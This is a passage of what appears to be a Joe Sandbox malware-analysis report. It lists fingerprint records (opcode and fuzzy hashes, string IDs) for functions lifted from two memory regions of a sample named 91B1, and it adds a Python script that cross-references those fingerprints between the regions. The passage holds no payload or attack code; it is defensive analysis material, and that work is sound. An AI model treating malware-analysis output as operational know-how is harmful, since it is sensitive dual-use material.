                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BI$ZG$3ej$pr
                                                                                                                                                                                                                                            • API String ID: 0-483502859
                                                                                                                                                                                                                                            • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction ID: d40615f4737d9136a2fb5e2ea9650c8d22d56d4359be3b3524cf045ddf46b0bc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09A1A1B56017818FD728CF29C590A62BFF2EF96314B1995AEC4D68F766D734E802CB10
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 67$V3R5$dB
                                                                                                                                                                                                                                            • API String ID: 0-2543814982
                                                                                                                                                                                                                                            • Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                            • Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: "w+y$?TUV$DX8Z
                                                                                                                                                                                                                                            • API String ID: 0-3307990326
                                                                                                                                                                                                                                            • Opcode ID: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                            • Instruction ID: 42d08a021de3f72c2cb7fa87eb591ac07f85e20f86aec561d7416a97d7d4ee9e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9c6fa3e94296cf0f303a5eebcc6256c78eaf4459c267ceffca2c103466db4c7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A081CE756007128FC728CF29C8A0A67B7F2FFA9710B19859DD8824FB65EB34E841CB55
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                            • API String ID: 2994545307-936430989
                                                                                                                                                                                                                                            • Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                            • Instruction ID: 1bde8819f6f7b7dbc416330df06e5e5b0ea208d0a860aecc15c429cbd1f7d48d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                            • API String ID: 0-936430989
                                                                                                                                                                                                                                            • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                            • Instruction ID: c0b8439f0c26c5a6023c669713cfb19d18569ccc3e59d052a4a45f8e55fa5d3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4482F6746083509FD764CF24D8A0B2FBBE2EBE6714F28892EE58547391D771D842CB46
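Each record above pairs a Source File (the memory region the function was lifted from, with "based on PE" saying whether that region is a mapped image or not) with per-function fingerprints. Two patterns in these records are worth pulling out mechanically rather than by eye: the Opcode ID f72a1af4... occurs both in the PE-backed image at 00400000 and in the non-PE region at 02490000, and the String ID ,)*k$I,~M occurs in both regions under two different Opcode IDs. The script below is an added example for this page, not Joe Sandbox code; it parses this record format and cross-references the fingerprints across regions. SAMPLE is copied from four of the records on this page with the label-only and fuzzy-hash lines left out; lines the parser does not recognise are skipped, so the full listing, leading whitespace included, can be fed in unchanged. The interpretations in the docstrings (an Opcode ID shared across regions is the same function body in both; a shared String ID with different Opcode IDs is the same referenced strings reached from different code) are this example's reading of the fields, not a statement of how Joe Sandbox computes them.

```python
"""Cross-reference Joe Sandbox "Similarity" function records across memory regions.

Added example for this report page; not Joe Sandbox code. The record layout is
the one printed on the page: "Memory Dump Source" followed by "• Key: value"
bullets. SAMPLE is copied from four records on the page, minus label-only and
fuzzy-hash lines; unrecognised lines are ignored, so the full listing works too.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

SAMPLE = """\
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: BI$ZG$3ej$pr
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• API ID:
• String ID: BI$ZG$3ej$pr
• Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID: ,)*k$I,~M
• Opcode ID: 6e5cbd4c0569671f9ac2a4ffa403741c4e36febb6378435fdd9cada9aaa80cb0
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Similarity
• API ID:
• String ID: ,)*k$I,~M
• Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
"""

# "<dump>.sdmp, Offset: <hex>, based on PE: true|false", exactly as printed on the page.
SOURCE_RE = re.compile(
    r"^(?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)


@dataclass
class FunctionRecord:
    dump: str = ""
    offset: int = 0          # base of the memory region the function lives in
    pe_backed: bool = False  # "based on PE: true" means the region is a mapped PE image
    fields: dict = field(default_factory=dict)

    def get(self, key):
        return self.fields.get(key, "")


def parse_records(text):
    """One FunctionRecord per "Memory Dump Source" block in the report text."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # section labels such as "Similarity" or "Yara matches"
        key, _, value = line[1:].partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            m = SOURCE_RE.match(value)
            if m is None:
                raise ValueError(f"unexpected Source File line: {value!r}")
            current.dump = m["dump"]
            current.offset = int(m["offset"], 16)
            current.pe_backed = m["pe"] == "true"
        else:
            current.fields[key] = value
    return records


def functions_in_multiple_regions(records):
    """Opcode IDs seen in more than one region: the same function body present
    both in the mapped image and in memory that is not PE-backed."""
    by_opcode = defaultdict(set)
    for r in records:
        if r.get("Opcode ID"):
            by_opcode[r.get("Opcode ID")].add(r.offset)
    return {k: sorted(v) for k, v in by_opcode.items() if len(v) > 1}


def string_id_variants(records):
    """String IDs shared by records whose Opcode IDs differ: the same referenced
    strings reached from different code, which is worth a manual diff."""
    by_string = defaultdict(set)
    for r in records:
        if r.get("String ID"):
            by_string[r.get("String ID")].add(r.get("Opcode ID"))
    return {k: sorted(v) for k, v in by_string.items() if len(v) > 1}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for opcode, bases in functions_in_multiple_regions(recs).items():
        print("same code in", [hex(b) for b in bases], opcode[:16] + "...")
    for sid, opcodes in string_id_variants(recs).items():
        print("same strings, different code:", sid, [o[:16] + "..." for o in opcodes])
```

Run against the page's full listing, the first function reports every Opcode ID that lives in both 00400000 and 02490000, which is the quickest way to confirm which functions the non-PE region shares with the on-disk image; the second flags functions to diff by hand, since identical strings under a different opcode hash can be either a re-linked copy or a genuinely different routine.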
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: Uninitialize
• String ID: PT
• API String ID: 3861434553-4135314810
• Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
• Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
• Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                                                                                                            • String ID: PT
                                                                                                                                                                                                                                            • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                            • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction ID: eff78ee87d626d3a0da557417c581b5285bdc2136f2726833c12f01c07caa04a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0A1DFB46087918FD726CF39C4A0A62BFE1EF57204B18869EC4D24FB66D339E406CB15
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BE$de
                                                                                                                                                                                                                                            • API String ID: 0-1272349043
                                                                                                                                                                                                                                            • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: BE$de
                                                                                                                                                                                                                                            • API String ID: 0-1272349043
                                                                                                                                                                                                                                            • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction ID: 0e8e7438c804aa875dc6167410859db01fb727295b33fbb0f872cd46ad9a3b9a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61D1097265C3648BDB24DF2888516AFFFE2EFC1208F18492DE8D59B391D675C506CB82
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                                                            • String ID: @$ihgf
                                                                                                                                                                                                                                            • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                            • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                            • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: @$ihgf
                                                                                                                                                                                                                                            • API String ID: 0-73152791
                                                                                                                                                                                                                                            • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                            • Instruction ID: 3b0646e180deb50f7a5a6296c2ddec3a8370d05c4e091f09dadf3508a8fc815a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 814127B56043018BD754CF28C88177BBBA2FFC2318F24862EE4499B390E735D805CB82
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: Z\$^P
                                                                                                                                                                                                                                            • API String ID: 0-3724859648
                                                                                                                                                                                                                                            • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                            • Instruction ID: 6ef4766a72a4222674f0c3935a1b9cb7306982faf8762867b4605a3192e60b05
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E941C0B2911600CFC718CF28C9A2A62B7B2FF59314B1A859DD49B8F7A4E738E441CF55
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: AzB$`rB
                                                                                                                                                                                                                                            • API String ID: 0-365317308
                                                                                                                                                                                                                                            • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                            • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: AzB$`rB
• API String ID: 0-365317308
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: c$
• API String ID: 0-2516980088
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: A67H
• API String ID: 0-3389657328
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: [
• API String ID: 0-3878419350
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ,)*k
• API String ID: 2994545307-1228391949
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,)*k
• API String ID: 0-1228391949
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID: m
• API String ID: 0-3775001192
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: 167H
• API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                            • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                            • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 167H
                                                                                                                                                                                                                                            • API String ID: 0-2704650348
                                                                                                                                                                                                                                            • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                            • Instruction ID: 68ed794287213f62c57d89f4b2042641088a8b9800cd6093fe2dc976d33dd27b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FD18772A043444BDB15CF298C816EBF792EFC5314F59862EE985873C0D775C906CBA2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                            • API String ID: 0-1505114982
                                                                                                                                                                                                                                            • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                            • Instruction ID: 81f36312a2ed6ba89055a7637830084efded24017588a7aed2dcd3164ab5f086
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72C105B5D01212CBCB24CF29C8917BBB7B1FF95314F19825ED896AB790E734A941CB90
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: .
                                                                                                                                                                                                                                            • API String ID: 0-1505114982
                                                                                                                                                                                                                                            • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                            • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: &#
                                                                                                                                                                                                                                            • API String ID: 0-1789715784
                                                                                                                                                                                                                                            • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                            • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
